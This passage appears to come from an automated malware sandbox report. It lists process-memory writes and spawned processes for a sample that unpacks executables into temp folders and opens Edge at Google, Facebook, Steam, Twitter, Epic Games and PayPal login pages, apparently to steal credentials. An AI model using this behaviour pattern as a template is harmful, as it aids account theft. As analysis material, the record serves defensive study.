PID 2968 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1576 wrote to memory of 220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1576 wrote to memory of 220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1608 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1608 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 4168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 4168 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4696 wrote to memory of 4856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4696 wrote to memory of 4856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2848 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2848 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2444 wrote to memory of 2152 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2444 wrote to memory of 2152 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 640 wrote to memory of 3416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 640 wrote to memory of 3416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 644 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4332 wrote to memory of 644 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4184 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x80,0x16c,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x160,0x170,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,14010378030531477124,557604693284316527,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,14010378030531477124,557604693284316527,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,16007915792298957661,14604347168252810204,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,16007915792298957661,14604347168252810204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,1600462903434901501,1178307414727189646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,1600462903434901501,1178307414727189646,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,6296491592435945765,12480780687126797459,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,6296491592435945765,12480780687126797459,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,11846787074871983252,13060158292471827091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,11846787074871983252,13060158292471827091,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8b46446f8,0x7ff8b4644708,0x7ff8b4644718

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2UN2323.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2UN2323.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,13716932941124904537,11504077824528404231,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,18338565794255676734,11284342132788086844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,12231682620304816748,1131880069781484464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

